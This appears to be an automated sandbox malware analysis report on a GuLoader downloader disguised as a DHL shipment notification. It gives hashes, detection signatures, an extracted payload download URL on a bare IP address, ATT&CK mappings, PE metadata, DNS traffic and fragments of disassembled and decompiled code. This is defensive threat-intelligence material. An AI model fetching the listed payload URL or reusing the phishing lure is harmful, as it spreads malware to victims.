Play interactive tour

Edit tour

Windows Analysis Report nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe

Overview

General Information

Sample Name:	nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe
Analysis ID:	491288
MD5:	cd65994e4f53363527e3651759103759
SHA1:	241dda06961d323299c19c1f558168864867169e
SHA256:	634115d5eb91226011678443a96617cb0bcc1831621b418a0e16860b79502de7
Tags:	DHLexeGuLoader
Infos:
Most interesting Screenshot:

Detection

GuLoader

Score:	84
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Potential malicious icon found

Multi AV Scanner detection for submitted file

Yara detected GuLoader

Found potential dummy code loops (likely to delay analysis)

Machine Learning detection for sample

C2 URLs / IPs found in malware configuration

Creates a DirectInput object (often for capturing keystrokes)

Uses 32bit PE files

Sample file is different than original file name gathered from version info

PE file contains strange resources

Program does not show much activity (idle)

Uses code obfuscation techniques (call, push, ret)

Abnormal high CPU Usage

Classification

Process Tree

System is w10x64

nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe (PID: 4880 cmdline: 'C:\Users\user\Desktop\nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe' MD5: CD65994E4F53363527E3651759103759)

cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "http://178.32.63.50/moss/nancata_Rbk"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.822232989.0000000000630000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000000.00000002.822232989.0000000000630000.00000040.00000001.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "http://178.32.63.50/moss/nancata_Rbk"}

Multi AV Scanner detection for submitted file

Show sources

Source: nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe	Virustotal: Detection: 29%			Perma Link
Source: nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe	ReversingLabs: Detection: 13%

Machine Learning detection for sample

Show sources

Source: nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe

Joe Sandbox ML: detected

Source: nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: http://178.32.63.50/moss/nancata_Rbk

Source: nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe, 00000000.00000002.822268717.00000000006AA000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary:

Potential malicious icon found

Show sources

Source: initial sample

Icon embedded in PE file: bad icon match: 20047c7c70f0e004

Source: nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe, 00000000.00000002.822145627.0000000000418000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameMESALLIANCER.exe vs nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe
Source: nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe	Binary or memory string: OriginalFilenameMESALLIANCER.exe vs nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe

Source: nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Users\user\Desktop\nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe

Process Stats: CPU usage > 98%

Source: nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe	Virustotal: Detection: 29%
Source: nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe	ReversingLabs: Detection: 13%

Source: nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: classification engine

Classification label: mal84.rans.troj.evad.winEXE@1/0@0/0

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match

File source: 00000000.00000002.822232989.0000000000630000.00000040.00000001.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe	Code function: 0_2_00408ECD push edi; iretd	0_2_00408ECE
Source: C:\Users\user\Desktop\nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe	Code function: 0_2_00406B5B push 8A084572h; ret	0_2_00406B68
Source: C:\Users\user\Desktop\nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe	Code function: 0_2_00407333 push esp; iretd	0_2_00407342

Source: C:\Users\user\Desktop\nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Anti Debugging:

Found potential dummy code loops (likely to delay analysis)

Show sources

Source: C:\Users\user\Desktop\nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe

Process Stats: CPU usage > 90% for more than 60s

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe, 00000000.00000002.822515492.0000000000D30000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe, 00000000.00000002.822515492.0000000000D30000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe, 00000000.00000002.822515492.0000000000D30000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe, 00000000.00000002.822515492.0000000000D30000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Process Injection1	Virtualization/Sandbox Evasion11	Input Capture1	Security Software Discovery1	Remote Services	Input Capture1	Exfiltration Over Other Network Medium	Application Layer Protocol1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection1	LSASS Memory	Virtualization/Sandbox Evasion11	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Junk Data	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information1	Security Account Manager	Process Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Binary Padding	NTDS	System Information Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe	29%	Virustotal		Browse
nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe	13%	ReversingLabs	Win32.Trojan.Mucc
nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://178.32.63.50/moss/nancata_Rbk	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://178.32.63.50/moss/nancata_Rbk	true	Avira URL Cloud: safe	unknown

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	491288
Start date:	27.09.2021
Start time:	12:42:54
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 0s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	21
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal84.rans.troj.evad.winEXE@1/0@0/0
EGA Information:	Failed
HDC Information:	Successful, ratio: 5.3% (good quality ratio 4.7%) Quality average: 54.6% Quality standard deviation: 22.3%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe Override analysis time to 240s for sample files taking high CPU consumption
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 23.54.113.53, 20.82.210.154, 23.0.174.200, 23.0.174.185, 20.199.120.85, 20.199.120.182, 20.199.120.151, 23.10.249.43, 23.10.249.26, 20.54.110.249, 40.112.88.60 Excluded domains from analysis (whitelisted): client.wns.windows.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, ctldl.windowsupdate.com, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a767.dspw65.akamai.net, a1449.dscg2.akamai.net, arc.msn.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.7049263215720325
TrID:	Win32 Executable (generic) a (10002005/4) 99.15% Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe
File size:	94208
MD5:	cd65994e4f53363527e3651759103759
SHA1:	241dda06961d323299c19c1f558168864867169e
SHA256:	634115d5eb91226011678443a96617cb0bcc1831621b418a0e16860b79502de7
SHA512:	077473c0b90b1f41f2775a144909ca6c4edd1c1a03df92ece1de2637124d5e3ed903bb6073e81e486906fe2b00b472f2da75e40d5ddcfebe2dfd016d3d2d1583
SSDEEP:	768:L/nxsMCmcp1FaKWg49kg8cf3hVFwal+HZL+J0d937yH38o5pjZ4vLJTX8HjlF8uj:znxUH49NNf3hMDkeyX8qpjZc9oX8M
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........,..SM..SM..SM...Q..RM...o..uM..ek..RM..RichSM..................PE..L......S.................@...@...............P....@........

File Icon


Icon Hash:	20047c7c70f0e004

Static PE Info

General
Entrypoint:	0x4012f0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x53BB158E [Mon Jul 7 21:47:58 2014 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	508f324e8f3f3b33e0170cdca30d1edb

Entrypoint Preview

Instruction
push 00401E10h
call 00007FECF88B8AE5h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
inc eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], ch
mov ebp, AB2B62B7h
pop esi
dec edi
mov dword ptr [ebx], ebx
jc 00007FECF88B8B49h
sub dh, ch
dec edi
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax], eax
add byte ptr [eax], al
add byte ptr [eax], al
add al, 00h
add byte ptr [eax], al
inc edx
inc ecx
inc ebx
dec ecx
dec esp
dec esp
dec ecx
inc edi
inc ebp
dec esi
dec ecx
inc ebx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
dec esp
xor dword ptr [eax], eax
add eax, 043F122Dh
ror byte ptr [01BD4FC1h], 00000015h
add dword ptr [ecx-02h], A71CC384h
mov cl, 82h
fdivp st(2), st(0)
jmp far B6EEh : 2E39B447h
rcr dword ptr [ebp-52B0C5C8h], 33h
cdq
iretw
adc dword ptr [edi+00AA000Ch], esi
pushad
rcl dword ptr [ebx+00000000h], cl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
aas
add dword ptr [eax], eax
add byte ptr [ebx+00h], bl
add byte ptr [eax], al
add byte ptr [49525000h], dl
dec esi
push esp
inc ebp
push edx
push esp
dec ecx
dec esp
push ebx
dec esp
push ebp
push esp
dec esi
dec ecx
dec esi
inc edi
inc ebp

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x14234	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x18000	0x8f4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x230	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x104	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x136d0	0x14000	False	0.483056640625	data	6.11514265963	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x15000	0x205c	0x1000	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x18000	0x8f4	0x1000	False	0.1708984375	data	1.95064287814	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x187c4	0x130	data
RT_ICON	0x184dc	0x2e8	data
RT_ICON	0x183b4	0x128	GLS_BINARY_LSB_FIRST
RT_GROUP_ICON	0x18384	0x30	data
RT_VERSION	0x18150	0x234	data	Chinese	Taiwan

Imports

DLL

Import

MSVBVM60.DLL

_CIcos, _adj_fptan, __vbaFreeVar, __vbaFreeVarList, _adj_fdiv_m64, _adj_fprem1, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryDestruct, __vbaExitProc, __vbaObjSet, __vbaOnError, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, DllFunctionCall, _adj_fpatan, __vbaLateIdCallLd, __vbaRedim, EVENT_SINK_Release, __vbaUI1I2, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaErrorOverflow, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, __vbaDerefAry1, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaVarDup, __vbaStrToAnsi, _CIatan, __vbaStrMove, _allmul, __vbaLateIdSt, _CItan, _CIexp, __vbaFreeStr, __vbaFreeObj

Version Infos

Description	Data
Translation	0x0404 0x04b0
InternalName	MESALLIANCER
FileVersion	1.00
CompanyName	Seismic
ProductName	HULKORTSOPERATRS
ProductVersion	1.00
OriginalFilename	MESALLIANCER.exe

Possible Origin

Language of compilation system	Country where language is spoken	Map
Chinese	Taiwan

Network Behavior

Network Port Distribution

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 27, 2021 12:43:49.699805975 CEST	53910	53	192.168.2.3	8.8.8.8
Sep 27, 2021 12:43:49.717845917 CEST	53	53910	8.8.8.8	192.168.2.3
Sep 27, 2021 12:44:14.517208099 CEST	64021	53	192.168.2.3	8.8.8.8
Sep 27, 2021 12:44:14.530689001 CEST	53	64021	8.8.8.8	192.168.2.3
Sep 27, 2021 12:44:41.740441084 CEST	60784	53	192.168.2.3	8.8.8.8
Sep 27, 2021 12:44:41.753941059 CEST	53	60784	8.8.8.8	192.168.2.3
Sep 27, 2021 12:44:43.092510939 CEST	51143	53	192.168.2.3	8.8.8.8
Sep 27, 2021 12:44:43.105638981 CEST	53	51143	8.8.8.8	192.168.2.3
Sep 27, 2021 12:44:50.006571054 CEST	56009	53	192.168.2.3	8.8.8.8
Sep 27, 2021 12:44:50.020108938 CEST	53	56009	8.8.8.8	192.168.2.3
Sep 27, 2021 12:44:51.339589119 CEST	59026	53	192.168.2.3	8.8.8.8
Sep 27, 2021 12:44:51.352498055 CEST	53	59026	8.8.8.8	192.168.2.3
Sep 27, 2021 12:45:00.533376932 CEST	49572	53	192.168.2.3	8.8.8.8
Sep 27, 2021 12:45:00.546736002 CEST	53	49572	8.8.8.8	192.168.2.3
Sep 27, 2021 12:45:02.577492952 CEST	60823	53	192.168.2.3	8.8.8.8
Sep 27, 2021 12:45:02.598989010 CEST	53	60823	8.8.8.8	192.168.2.3
Sep 27, 2021 12:45:15.179136038 CEST	52130	53	192.168.2.3	8.8.8.8
Sep 27, 2021 12:45:15.212984085 CEST	53	52130	8.8.8.8	192.168.2.3
Sep 27, 2021 12:45:19.255880117 CEST	55102	53	192.168.2.3	8.8.8.8
Sep 27, 2021 12:45:19.272579908 CEST	53	55102	8.8.8.8	192.168.2.3
Sep 27, 2021 12:45:20.886879921 CEST	56236	53	192.168.2.3	8.8.8.8
Sep 27, 2021 12:45:20.900337934 CEST	53	56236	8.8.8.8	192.168.2.3
Sep 27, 2021 12:45:21.282376051 CEST	56527	53	192.168.2.3	8.8.8.8
Sep 27, 2021 12:45:21.295480967 CEST	53	56527	8.8.8.8	192.168.2.3
Sep 27, 2021 12:45:21.602353096 CEST	49559	53	192.168.2.3	8.8.8.8
Sep 27, 2021 12:45:21.615474939 CEST	53	49559	8.8.8.8	192.168.2.3
Sep 27, 2021 12:45:22.005676985 CEST	52650	53	192.168.2.3	8.8.8.8
Sep 27, 2021 12:45:22.018755913 CEST	53	52650	8.8.8.8	192.168.2.3
Sep 27, 2021 12:45:22.443695068 CEST	63297	53	192.168.2.3	8.8.8.8
Sep 27, 2021 12:45:22.457021952 CEST	53	63297	8.8.8.8	192.168.2.3
Sep 27, 2021 12:45:22.474421978 CEST	58361	53	192.168.2.3	8.8.8.8
Sep 27, 2021 12:45:22.502067089 CEST	53	58361	8.8.8.8	192.168.2.3
Sep 27, 2021 12:45:23.040069103 CEST	53615	53	192.168.2.3	8.8.8.8
Sep 27, 2021 12:45:23.054069042 CEST	53	53615	8.8.8.8	192.168.2.3
Sep 27, 2021 12:45:23.902992964 CEST	50728	53	192.168.2.3	8.8.8.8
Sep 27, 2021 12:45:23.916857958 CEST	53	50728	8.8.8.8	192.168.2.3
Sep 27, 2021 12:45:25.215950966 CEST	53777	53	192.168.2.3	8.8.8.8
Sep 27, 2021 12:45:25.229506969 CEST	53	53777	8.8.8.8	192.168.2.3
Sep 27, 2021 12:45:25.829730034 CEST	57106	53	192.168.2.3	8.8.8.8
Sep 27, 2021 12:45:25.842989922 CEST	53	57106	8.8.8.8	192.168.2.3
Sep 27, 2021 12:45:38.700748920 CEST	60352	53	192.168.2.3	8.8.8.8
Sep 27, 2021 12:45:38.713826895 CEST	53	60352	8.8.8.8	192.168.2.3
Sep 27, 2021 12:45:44.393554926 CEST	56773	53	192.168.2.3	8.8.8.8
Sep 27, 2021 12:45:44.427717924 CEST	53	56773	8.8.8.8	192.168.2.3
Sep 27, 2021 12:46:04.534171104 CEST	60982	53	192.168.2.3	8.8.8.8
Sep 27, 2021 12:46:04.547214031 CEST	53	60982	8.8.8.8	192.168.2.3
Sep 27, 2021 12:46:24.065207958 CEST	58058	53	192.168.2.3	8.8.8.8
Sep 27, 2021 12:46:24.094876051 CEST	53	58058	8.8.8.8	192.168.2.3
Sep 27, 2021 12:46:38.457324982 CEST	64367	53	192.168.2.3	8.8.8.8
Sep 27, 2021 12:46:38.470845938 CEST	53	64367	8.8.8.8	192.168.2.3
Sep 27, 2021 12:46:45.637041092 CEST	51539	53	192.168.2.3	8.8.8.8
Sep 27, 2021 12:46:45.663388968 CEST	53	51539	8.8.8.8	192.168.2.3
Sep 27, 2021 12:47:14.431416035 CEST	55393	53	192.168.2.3	8.8.8.8
Sep 27, 2021 12:47:14.446630955 CEST	53	55393	8.8.8.8	192.168.2.3

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

System Behavior

Analysis Process: nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe PID: 4880 Parent PID: 620

General

Start time:	12:43:53
Start date:	27/09/2021
Path:	C:\Users\user\Desktop\nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe'
Imagebase:	0x400000
File size:	94208 bytes
MD5 hash:	CD65994E4F53363527E3651759103759
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.822232989.0000000000630000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe PID: 4880 Parent PID: 620 nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeCOMMON

Executed Functions

Function 00413AA4, Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 146
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E00413AA4(void* __ebx, void* __edi, void* __esi, signed int _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v36;
				intOrPtr _v44;
				char _v52;
				intOrPtr _v60;
				char _v68;
				intOrPtr _v76;
				char _v84;
				intOrPtr _v92;
				char _v100;
				intOrPtr _v108;
				signed int _v116;
				intOrPtr _v124;
				char _v132;
				char _v168;
				char _v172;
				char* _t68;
				void* _t78;
				char _t79;
				char* _t90;
				signed int _t107;
				signed int _t108;
				void* _t109;
				void* _t111;
				intOrPtr _t112;

				_t112 = _t111 - 0xc;
				 *[fs:0x0] = _t112;
				_v16 = _t112 - 0xa0;
				_v12 = 0x401110;
				_t107 = _a4;
				_v8 = _t107 & 0x00000001;
				_t108 = _t107 & 0xfffffffe;
				_a4 = _t108;
				 *((intOrPtr*)( *_t108 + 4))(_t108, __edi, __esi, __ebx,  *[fs:0x0], 0x401176, _t109);
				_v116 = 0;
				_v36 = 0;
				_v52 = 0;
				_v68 = 0;
				_v84 = 0;
				_v100 = 0;
				_v132 = 0;
				_v168 = 0;
				_v172 = 0;
				_v108 = 0x403498;
				_v116 = 8;
				L00401284();
				_push( &_v52);
				_push( &_v68);
				L0040128A();
				_v124 = 0x4034a0;
				_push( &_v68);
				_t68 =  &_v132;
				_push(_t68);
				_v132 = 0x8008;
				L00401290();
				_push( &_v68);
				_push( &_v52);
				_push(2);
				L0040127E();
				if(_t68 != 0) {
					_push(1);
					_push(L"BRDMASKINERNES");
					L00401278();
				}
				L00401272();
				 *((intOrPtr*)( *_t108 + 0x6fc))(_t108);
				_v172 =  *0x40110c;
				L0040126C();
				 *((intOrPtr*)( *_t108 + 0x700))(_t108,  &_v36, 0x5d020a,  &_v172,  &_v168);
				L00401266();
				_v172 =  *0x401108;
				 *((intOrPtr*)( *_t108 + 0x708))(_t108,  &_v172, 0x53239, 0x45ef);
				_t78 =  *((intOrPtr*)( *_t108 + 0x2b4))(_t108);
				asm("fclex");
				if(_t78 < 0) {
					_push(0x2b4);
					_push(0x4030f0);
					_push(_t108);
					_push(_t78);
					L00401260();
				}
				_v92 = 0x80020004;
				_t79 = 0xa;
				_v76 = 0x80020004;
				_v60 = 0x80020004;
				_v100 = _t79;
				_v84 = _t79;
				_v68 = _t79;
				 *((intOrPtr*)( *_t108 + 0x70c))(_t108,  &_v172);
				_v52 = 3;
				_v44 = _v172;
				_push( &_v100);
				_push( &_v84);
				_push( &_v68);
				_push(0);
				_push( &_v52);
				L0040125A();
				_push( &_v100);
				_push( &_v84);
				_push( &_v68);
				_t90 =  &_v52;
				_push(_t90);
				_push(4);
				L0040127E();
				_v8 = 0;
				asm("wait");
				_push(0x413c9f);
				return _t90;
			}

0x00413aa7
0x00413ab6
0x00413ac6
0x00413ac9
0x00413ad0
0x00413ad8
0x00413adb
0x00413adf
0x00413ae4
0x00413aec
0x00413af2
0x00413af5
0x00413af8
0x00413afb
0x00413afe
0x00413b01
0x00413b04
0x00413b0a
0x00413b10
0x00413b17
0x00413b1e
0x00413b26
0x00413b2a
0x00413b2b
0x00413b33
0x00413b3a
0x00413b3b
0x00413b3e
0x00413b3f
0x00413b46
0x00413b51
0x00413b55
0x00413b56
0x00413b58
0x00413b63
0x00413b65
0x00413b67
0x00413b6c
0x00413b6c
0x00413b71
0x00413b79
0x00413b8d
0x00413b93
0x00413bb2
0x00413bbb
0x00413bcd
0x00413be0
0x00413be9
0x00413bf1
0x00413bf3
0x00413bf5
0x00413bfa
0x00413bff
0x00413c00
0x00413c01
0x00413c01
0x00413c0d
0x00413c10
0x00413c11
0x00413c14
0x00413c1d
0x00413c20
0x00413c23
0x00413c2a
0x00413c36
0x00413c3d
0x00413c43
0x00413c47
0x00413c4b
0x00413c4f
0x00413c50
0x00413c51
0x00413c59
0x00413c5d
0x00413c61
0x00413c62
0x00413c65
0x00413c66
0x00413c68
0x00413c70
0x00413c73
0x00413c74
0x00000000

APIs

__vbaVarDup.MSVBVM60 ref: 00413B1E
#518.MSVBVM60(?,?), ref: 00413B2B
__vbaVarTstNe.MSVBVM60(?,?,?,?), ref: 00413B46
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,?), ref: 00413B58
